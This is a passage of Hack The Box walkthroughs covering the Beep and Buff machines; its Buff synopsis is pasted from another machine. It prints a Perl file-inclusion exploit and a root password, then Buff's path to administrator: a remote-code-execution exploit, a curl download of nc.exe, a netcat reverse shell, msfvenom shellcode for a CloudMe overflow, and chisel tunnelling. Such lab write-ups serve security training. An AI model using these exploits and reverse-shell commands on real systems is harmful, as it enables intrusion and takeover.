Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities                              | php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion                                           | php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection                                                          | php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection                                                         | php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution                                     | php/webapps/18650.py
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

The third one is CSS and requires an active user. Therefore, we will use the fourth one.

$ searchsploit -m 37637
  Exploit: Elastix 2.2.0 - 'graph.php' Local File Inclusion
      URL: https://www.exploit-db.com/exploits/37637
     Path: /usr/share/exploitdb/exploits/php/webapps/37637.pl
File Type: ASCII text, with CRLF line terminators

Copied to: /home/ikkyu/Desktop/beep/37637.pl

Copy 37637.pl and look at the code.

$ cat 37637.pl 
source: https://www.securityfocus.com/bid/55078/info

Elastix is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.

Elastix 2.2.0 is vulnerable; other versions may also be affected. 

#!/usr/bin/perl -w

#------------------------------------------------------------------------------------# 
#Elastix is an Open Source Sofware to establish Unified Communications. 
#About this concept, Elastix goal is to incorporate all the communication alternatives,
#available at an enterprise level, into a unique solution.
#------------------------------------------------------------------------------------#
############################################################
# Exploit Title: Elastix 2.2.0 LFI
# Google Dork: :(
# Author: cheki
# Version:Elastix 2.2.0
# Tested on: multiple
# CVE : notyet
# romanc-_-eyes ;) 
# Discovered by romanc-_-eyes
# vendor http://www.elastix.org/

print "\t Elastix 2.2.0 LFI Exploit \n";
print "\t code author cheki   \n";
print "\t 0day Elastix 2.2.0  \n";
print "\t email: anonymous17hacker{}gmail.com \n";

#LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

use LWP::UserAgent;
print "\n Target: https://ip ";
chomp(my $target=<STDIN>);
$dir="vtigercrm";
$poc="current_language";
$etc="etc";
$jump="../../../../../../../..//";
$test="amportal.conf%00";

$code = LWP::UserAgent->new() or die "inicializacia brauzeris\n";
$code->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/".$dir."/graph.php?".$poc."=".$jump."".$etc."/".$test."&module=Accounts&action";
$res = $code->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~ 'This file is part of FreePBX') {

print "\n read amportal.conf file : $answer \n\n";
print " successful read\n";

}
else { 
print "\n[-] not successful\n";
        }

Type "https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action" into your browser based on the information in the middle of the code.

The result of "dirbuster" already confirms the existence of "/vtigercrm".

It's hard to read, so let's look at the source. You will see the user name and password.

Make an ssh connection to the target machine with the username "root" and the password "jEhdIekWmdjE".

$ ssh root@10.10.10.7

After connecting to ssh, read root.txt to get the flag.

【Hack the Box】Buff - Walkthrough

ikkyu — Thu, 14 Jan 2021 12:35:32 +0000

From the HackTheBox

SYNOPSISGrandpa is one of the simpler machines on Hack The Box, however it covers the widely-exploitedCVE-2017-7269. This vulnerability is trivial to exploit and granted immediate access to thousandsof IIS servers around the globe when it became public knowledge.

Enumeration

# Nmap 7.80 scan initiated Fri Sep 25 20:44:58 2020 as: nmap -sV -sC -Pn -oA nmap --script vuln 10.10.10.198
Nmap scan report for 10.10.10.198
Host is up (0.34s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.198
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.10.10.198:8080/
|     Form id: 
|     Form action: include/process_login.php
|     
|     Path: http://10.10.10.198:8080/facilities.php
|     Form id: 
|     Form action: include/process_login.php
|     
|     Path: http://10.10.10.198:8080/packages.php
|     Form id: 
|     Form action: include/process_login.php
|     
|     Path: http://10.10.10.198:8080/about.php
|     Form id: 
|     Form action: include/process_login.php
|     
|     Path: http://10.10.10.198:8080/contact.php
|     Form id: 
|     Form action: include/process_login.php
|     
|     Path: http://10.10.10.198:8080/index.php
|     Form id: 
|_    Form action: include/process_login.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /icons/: Potentially interesting folder w/ directory listing
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:apache:http_server:2.4.43: 
|       CVE-2010-0425   10.0    https://vulners.com/cve/CVE-2010-0425
|       CVE-1999-1412   10.0    https://vulners.com/cve/CVE-1999-1412
|       CVE-1999-1237   10.0    https://vulners.com/cve/CVE-1999-1237
|       CVE-1999-0236   10.0    https://vulners.com/cve/CVE-1999-0236
|       CVE-2009-1955   7.8 https://vulners.com/cve/CVE-2009-1955
|       CVE-2007-6423   7.8 https://vulners.com/cve/CVE-2007-6423
|       CVE-2007-0086   7.8 https://vulners.com/cve/CVE-2007-0086
|       CVE-2020-11984  7.5 https://vulners.com/cve/CVE-2020-11984
|       CVE-2009-3095   7.5 https://vulners.com/cve/CVE-2009-3095
|       CVE-2007-4723   7.5 https://vulners.com/cve/CVE-2007-4723
|       CVE-2009-1891   7.1 https://vulners.com/cve/CVE-2009-1891
|       CVE-2009-1890   7.1 https://vulners.com/cve/CVE-2009-1890
|       CVE-2008-2579   6.8 https://vulners.com/cve/CVE-2008-2579
|       CVE-2007-5156   6.8 https://vulners.com/cve/CVE-2007-5156
|       CVE-2020-9490   5.0 https://vulners.com/cve/CVE-2020-9490
|       CVE-2014-0231   5.0 https://vulners.com/cve/CVE-2014-0231
|       CVE-2011-1752   5.0 https://vulners.com/cve/CVE-2011-1752
|       CVE-2010-1452   5.0 https://vulners.com/cve/CVE-2010-1452
|       CVE-2010-0408   5.0 https://vulners.com/cve/CVE-2010-0408
|       CVE-2009-2699   5.0 https://vulners.com/cve/CVE-2009-2699
|       CVE-2007-0450   5.0 https://vulners.com/cve/CVE-2007-0450
|       CVE-2005-1268   5.0 https://vulners.com/cve/CVE-2005-1268
|       CVE-2003-0020   5.0 https://vulners.com/cve/CVE-2003-0020
|       CVE-2001-1556   5.0 https://vulners.com/cve/CVE-2001-1556
|       CVE-1999-0678   5.0 https://vulners.com/cve/CVE-1999-0678
|       CVE-1999-0289   5.0 https://vulners.com/cve/CVE-1999-0289
|       CVE-1999-0070   5.0 https://vulners.com/cve/CVE-1999-0070
|       CVE-2009-1195   4.9 https://vulners.com/cve/CVE-2009-1195
|       CVE-2020-11993  4.3 https://vulners.com/cve/CVE-2020-11993
|       CVE-2011-1783   4.3 https://vulners.com/cve/CVE-2011-1783
|       CVE-2010-0434   4.3 https://vulners.com/cve/CVE-2010-0434
|       CVE-2008-2939   4.3 https://vulners.com/cve/CVE-2008-2939
|       CVE-2008-2168   4.3 https://vulners.com/cve/CVE-2008-2168
|       CVE-2008-0455   4.3 https://vulners.com/cve/CVE-2008-0455
|       CVE-2007-6420   4.3 https://vulners.com/cve/CVE-2007-6420
|       CVE-2007-6388   4.3 https://vulners.com/cve/CVE-2007-6388
|       CVE-2007-5000   4.3 https://vulners.com/cve/CVE-2007-5000
|       CVE-2007-4465   4.3 https://vulners.com/cve/CVE-2007-4465
|       CVE-2007-1349   4.3 https://vulners.com/cve/CVE-2007-1349
|       CVE-2007-6422   4.0 https://vulners.com/cve/CVE-2007-6422
|       CVE-2007-6421   3.5 https://vulners.com/cve/CVE-2007-6421
|_      CVE-2001-0131   1.2 https://vulners.com/cve/CVE-2001-0131

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 25 20:51:08 2020 -- 1 IP address (1 host up) scanned in 370.35 seconds

I found port 8080 is open.

Local Privilege Escalation

I searched gym in metasploit and found 48506.py.

$ searchsploit gym
[i] Found (#1): /home/ikkyu/exploitdb/files_exploits.csv
[i] To remove this message, please edit "/home/ikkyu/exploitdb/.searchsploit_rc" for "files_exploits.csv" (package_array: exploitdb)

[i] Found (#1): /home/ikkyu/exploitdb/files_shellcodes.csv
[i] To remove this message, please edit "/home/ikkyu/exploitdb/.searchsploit_rc" for "files_shellcodes.csv" (package_array: exploitdb)

-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                        |  Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - Unauthenticated Remote Code Execution                                                                     | php/webapps/48506.py
WordPress Plugin WPGYM - SQL Injection                                                                                                | php/webapps/42801.txt
------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

I run this.

$ python ~/exploitdb/exploits/php/webapps/48506.py http://10.10.10.198:8080/

            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload>

C:\xampp\htdocs\gym\upload> whoami
�PNG
�
buff\shaun

Now I got the machine. Next we neet to upload nc.exe to upgrade shell.

At local machine:

$ python -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

At target machine:

C:\xampp\htdocs\gym\upload> curl http://10.10.14.6:8000/nc.exe -o nc.exe
�PNG
�

C:\xampp\htdocs\gym\upload> dir
�PNG
�
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\xampp\htdocs\gym\upload

22/12/2020  12:04    <DIR>          .
22/12/2020  12:04    <DIR>          ..
22/12/2020  12:04                53 kamehameha.php
22/12/2020  11:40            38,616 nc.exe
               2 File(s)         38,669 bytes
               2 Dir(s)   7,315,296,256 bytes free

I succeeded in uploading.
Now we can get a reverse shell.

At local machine:

rlwrap nc -lvnp 4444
Listening on 0.0.0.0 4444

At target machine:

C:\xampp\htdocs\gym\upload> nc.exe 10.10.14.6 4444 -e cmd.exe

At local machine:

rlwrap nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.10.198 49682
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\gym\upload>

I got a reverse shell.

Administrator Privilege Escalation

I checked process.

C:\xampp\htdocs\gym\upload>tasklist
tasklist

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0                            0          8 K
System                           4                            0         44 K
Registry                       104                            0      7,392 K
smss.exe                       368                            0        384 K
csrss.exe                      456                            0      3,856 K
wininit.exe                    532                            0      4,608 K
csrss.exe                      540                            1      3,452 K
winlogon.exe                   604                            1      8,888 K
services.exe                   676                            0      8,296 K
lsass.exe                      696                            0     12,072 K
svchost.exe                    812                            0      2,520 K
fontdrvhost.exe                836                            0     13,900 K
fontdrvhost.exe                844                            1      8,100 K
svchost.exe                    860                            0     22,724 K
svchost.exe                    956                            0     12,036 K
svchost.exe                   1004                            0      6,028 K
dwm.exe                        328                            1     41,676 K
svchost.exe                    360                            0      8,292 K
svchost.exe                    948                            0      7,100 K
svchost.exe                    996                            0      9,664 K
svchost.exe                   1076                            0     18,084 K
svchost.exe                   1136                            0     18,504 K
svchost.exe                   1208                            0      5,984 K
svchost.exe                   1280                            0      5,680 K
svchost.exe                   1380                            0      8,672 K
svchost.exe                   1388                            0     10,612 K
svchost.exe                   1408                            0      4,044 K
svchost.exe                   1416                            0      7,352 K
svchost.exe                   1516                            0      9,604 K
svchost.exe                   1552                            0     12,944 K
Memory Compression            1564                            0     30,132 K
svchost.exe                   1592                            0      7,004 K
svchost.exe                   1676                            0      6,028 K
svchost.exe                   1772                            0      5,036 K
svchost.exe                   1780                            0      5,792 K
svchost.exe                   1824                            0      6,956 K
svchost.exe                   1880                            0      8,588 K
svchost.exe                   1988                            0      6,180 K
svchost.exe                   1456                            0      6,364 K
svchost.exe                   1336                            0      7,044 K
svchost.exe                   1240                            0      4,432 K
svchost.exe                   2060                            0      7,564 K
svchost.exe                   2132                            0      9,108 K
svchost.exe                   2284                            0      5,600 K
spoolsv.exe                   2300                            0     12,040 K
svchost.exe                   2424                            0      6,124 K
svchost.exe                   2736                            0      7,660 K
svchost.exe                   2748                            0     14,036 K
svchost.exe                   2760                            0     19,308 K
svchost.exe                   2768                            0      3,696 K
svchost.exe                   2756                            0      4,532 K
vmtoolsd.exe                  2788                            0     18,696 K
svchost.exe                   2796                            0     13,656 K
svchost.exe                   2804                            0     15,532 K
SecurityHealthService.exe     2832                            0     13,048 K
MsMpEng.exe                   2864                            0    169,640 K
VGAuthService.exe             2880                            0      7,840 K
svchost.exe                   2980                            0      7,080 K
svchost.exe                   2052                            0      9,868 K
svchost.exe                   3104                            0      9,768 K
svchost.exe                   3144                            0      3,568 K
dllhost.exe                   3660                            0     11,308 K
WmiPrvSE.exe                  3848                            0     14,188 K
msdtc.exe                     2720                            0      8,132 K
svchost.exe                   4540                            0     30,464 K
sihost.exe                    4596                            1     21,576 K
svchost.exe                   4620                            1     11,716 K
svchost.exe                   4672                            1     24,212 K
taskhostw.exe                 4768                            1      9,896 K
svchost.exe                   4932                            0      5,548 K
ctfmon.exe                    4992                            1     10,796 K
svchost.exe                   5080                            0      5,848 K
svchost.exe                   5092                            0     11,500 K
NisSrv.exe                    5212                            0      7,268 K
WmiPrvSE.exe                  5276                            0     18,888 K
explorer.exe                  5716                            1     79,172 K
svchost.exe                   5776                            0     16,212 K
svchost.exe                   5796                            0     11,372 K
svchost.exe                   5960                            0      5,312 K
svchost.exe                   6000                            0     12,380 K
svchost.exe                   5444                            0      4,852 K
svchost.exe                   4416                            0      4,976 K
ShellExperienceHost.exe       1048                            1     51,772 K
SearchUI.exe                  6360                            1    118,800 K
RuntimeBroker.exe             6588                            1     16,452 K
ApplicationFrameHost.exe      6780                            1     26,996 K
MicrosoftEdge.exe             7072                            1     55,284 K
browser_broker.exe            7160                            1      6,876 K
svchost.exe                   6316                            0      4,668 K
Windows.WARP.JITService.e     4404                            0      3,380 K
RuntimeBroker.exe             4356                            1      5,012 K
MicrosoftEdgeCP.exe           4220                            1     18,920 K
RuntimeBroker.exe             4464                            1     13,908 K
MicrosoftEdgeCP.exe           2672                            1     21,300 K
svchost.exe                   7332                            0     11,264 K
conhost.exe                   7464                            0      1,008 K
SearchIndexer.exe             8140                            0     23,680 K
MSASCuiL.exe                  7424                            1      6,812 K
vmtoolsd.exe                  5748                            1     13,220 K
httpd.exe                     1712                            0        460 K
mysqld.exe                    7716                            0      3,480 K
svchost.exe                   2572                            0      3,636 K
svchost.exe                   5304                            1     14,224 K
httpd.exe                     1460                            0      9,188 K
svchost.exe                   6552                            0     12,824 K
SgrmBroker.exe                2296                            0      2,704 K
svchost.exe                   8248                            0      6,984 K
CompatTelRunner.exe           1104                            0        632 K
conhost.exe                   8608                            0      1,216 K
svchost.exe                   7788                            0      8,192 K
Microsoft.Photos.exe          2528                            1      5,240 K
RuntimeBroker.exe             3856                            1     12,252 K
WinStore.App.exe              8424                            1     26,440 K
RuntimeBroker.exe             4556                            1      5,240 K
SystemSettings.exe            7764                            1     32,228 K
svchost.exe                   5984                            0      4,748 K
svchost.exe                   7484                            0      9,652 K
taskhostw.exe                 5920                            1     20,872 K
taskhostw.exe                 3520                            0     23,440 K
CompatTelRunner.exe           1548                            0      2,428 K
conhost.exe                   8792                            0      9,736 K
TrustedInstaller.exe          1016                            0      5,524 K
svchost.exe                    196                            0      5,352 K
TiWorker.exe                  2148                            0    103,996 K
svchost.exe                   8784                            0      7,844 K
svchost.exe                   6488                            0      3,792 K
svchost.exe                   8596                            0     11,860 K
cmd.exe                       7204                            0      2,432 K
conhost.exe                   9176                            0      9,132 K
nc.exe                        7192                            0      5,436 K
cmd.exe                       4504                            0      3,988 K
cmd.exe                        708                            0      3,208 K
conhost.exe                   2452                            0     10,868 K
CloudMe.exe                   3496                            0     26,884 K
timeout.exe                   5968                            0      3,920 K
tasklist.exe                  8796                            0      7,772 K

I found CloudMe.exe. CloudMe is known to be vulnerable. I searched cloudme in metasploit.

$ searchsploit cloudme

--------------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
--------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC)        | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASL | win
ws/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASL | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasplo | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(D | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Over | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow   | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghu | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 ( | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow       | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) | windows_x86-64/remote/44784.py
--------------------------------------------------- ---------------------------------
Shellcodes: No Results

I found 48389.py. I searched about this on exploit-db.

Now we need to modify this code a bit and remote port forwarding on the target machine.You can see from the exploit-db that the default is to launch the calculator.

I created payload. Here, the port is set to 4445, but it can be anything.

$ msfvenom -a x86 -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe 10.10.14.28 4445 -e cmd.exe' -b '\x00\x0A\x0D' -f python -v payload
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 273 (iteration=0)
x86/shikata_ga_nai chosen with final size 273
Payload size: 273 bytes
Final size of python file: 1452 bytes
payload =  b""
payload += b"\xda\xcf\xd9\x74\x24\xf4\xbe\xe3\xce\xa2\x54\x5a"
payload += b"\x29\xc9\xb1\x3e\x31\x72\x19\x83\xea\xfc\x03\x72"
payload += b"\x15\x01\x3b\x5e\xbc\x47\xc4\x9f\x3d\x27\x4c\x7a"
payload += b"\x0c\x67\x2a\x0e\x3f\x57\x38\x42\xcc\x1c\x6c\x77"
payload += b"\x47\x50\xb9\x78\xe0\xde\x9f\xb7\xf1\x72\xe3\xd6"
payload += b"\x71\x88\x30\x39\x4b\x43\x45\x38\x8c\xb9\xa4\x68"
payload += b"\x45\xb6\x1b\x9d\xe2\x82\xa7\x16\xb8\x03\xa0\xcb"
payload += b"\x09\x22\x81\x5d\x01\x7d\x01\x5f\xc6\xf6\x08\x47"
payload += b"\x0b\x32\xc2\xfc\xff\xc9\xd5\xd4\x31\x32\x79\x19"
payload += b"\xfe\xc1\x83\x5d\x39\x39\xf6\x97\x39\xc4\x01\x6c"
payload += b"\x43\x12\x87\x77\xe3\xd1\x3f\x5c\x15\x36\xd9\x17"
payload += b"\x19\xf3\xad\x70\x3e\x02\x61\x0b\x3a\x8f\x84\xdc"
payload += b"\xca\xcb\xa2\xf8\x97\x88\xcb\x59\x72\x7f\xf3\xba"
payload += b"\xdd\x20\x51\xb0\xf0\x35\xe8\x9b\x9e\xc8\x7e\xa6"
payload += b"\xed\xca\x80\xa9\x41\xa2\xb1\x22\x0e\xb5\x4d\xe1"
payload += b"\x6a\x49\x04\xa8\xdb\xc1\xc1\x38\x5e\x8c\xf1\x96"
payload += b"\x9d\xa8\x71\x13\x5e\x4f\x69\x56\x5b\x14\x2d\x8a"
payload += b"\x11\x05\xd8\xac\x86\x26\xc9\xee\x12\x84\x8a\x91"
payload += b"\x0f\x44\x1b\x0e\xb8\xd0\xbf\xc1\x5b\x6b\x1c\x79"
payload += b"\xe5\xe6\xc0\xf0\x65\x94\x97\x9b\xe1\x38\x06\x3f"
payload += b"\xc4\xa5\xae\xda\x38\x14\x7f\x0b\x08\x66\x51\x62"
payload += b"\x5e\xa8\x9f\xbc\xbe\x80\xeb\x88\x8b\xc8\x3e\x94"
payload += b"\xd3\x6b\x2c\x32\x3a\x0e\xd6\xdf\x42"

Replace the payload part of 48389.py.
Next, we need to upload chisel.exe to remote port forwarding as before. After uploading,at local machine:

$ chisel server -p 1234 -reverse -v
2021/01/07 17:33:38 server: Reverse tunnelling enabled
2021/01/07 17:33:38 server: Fingerprint Wf5cpZzaVbfNXiWNsUT8AEcLYgEeOI7r3U440nagv08=
2021/01/07 17:33:38 server: Listening on http://0.0.0.0:1234

At target machine:

C:\xampp\htdocs\gym\upload>chisel.exe client -v 10.10.14.28:1234 R:8888:127.0.0.1:8888 --keepalive:1000
chisel.exe client -v 10.10.14.28:1234 R:8888:127.0.0.1:8888 --keepalive:1000
2021/01/07 07:31:30 client: Connecting to ws://10.10.14.28:1234
2021/01/07 07:31:30 client: tun: proxy#1000=>--keepalive:1000: Listening
2021/01/07 07:31:30 client: tun: Bound proxies
2021/01/07 07:31:31 client: Handshaking...
2021/01/07 07:31:33 client: Sending config
2021/01/07 07:31:33 client: Connected (Latency 336.4421ms)
2021/01/07 07:31:33 client: tun: SSH connected

Now start a netcat listener on 4445 and execute the pyload on the second terminal.

$ nc -lnvp 4445
Listening on 0.0.0.0 4445

Connection received on 10.10.10.198 49686
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
buff\administrator

We got the admin.